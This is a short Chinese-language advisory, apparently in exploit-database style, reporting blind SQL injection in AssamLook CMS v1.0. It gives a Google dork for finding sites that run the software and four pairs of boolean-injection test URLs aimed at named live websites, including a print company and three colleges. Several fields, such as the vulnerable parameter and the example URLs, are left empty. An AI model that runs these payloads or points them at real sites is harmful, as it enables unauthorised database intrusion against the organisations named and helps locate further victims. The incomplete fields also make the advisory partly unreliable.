关键信息 漏洞概述 漏洞类型: 盲注SQL注入 (Blind SQL Injection) 受影响软件: AssamLook CMS v1.0 厂商: https://assamlook.com/ Google Dork: intext:"Powered By Assamlook.com" 类别: Web应用程序 测试环境: Windows, Firefox 漏洞参数 易受攻击的参数: 或 URL示例: - - 描述 AssamLook CMS 存在以下页面的盲注SQL注入漏洞: 示例 Demo 1: - https://rhinoprintopacks.com/product.php?id=53' and 1=1-- - https://rhinoprintopacks.com/product.php?id=53' and 1=2-- Demo 2: - https://www.nonolcollege.in/department-profile.php?did=1' and 1=1-- - https://www.nonolcollege.in/department-profile.php?did=1' and 1=2-- Demo 3: - https://rahacollege.co.in/department-profile.php?did=3' and 1=1-- - https://rahacollege.co.in/department-profile.php?did=3' and 1=2-- Demo 4: - https://www.ludingcollege.org/view_tender.php?id=108' and 1=1-- - https://www.ludingcollege.org/view_tender.php?id=108' and 1=2--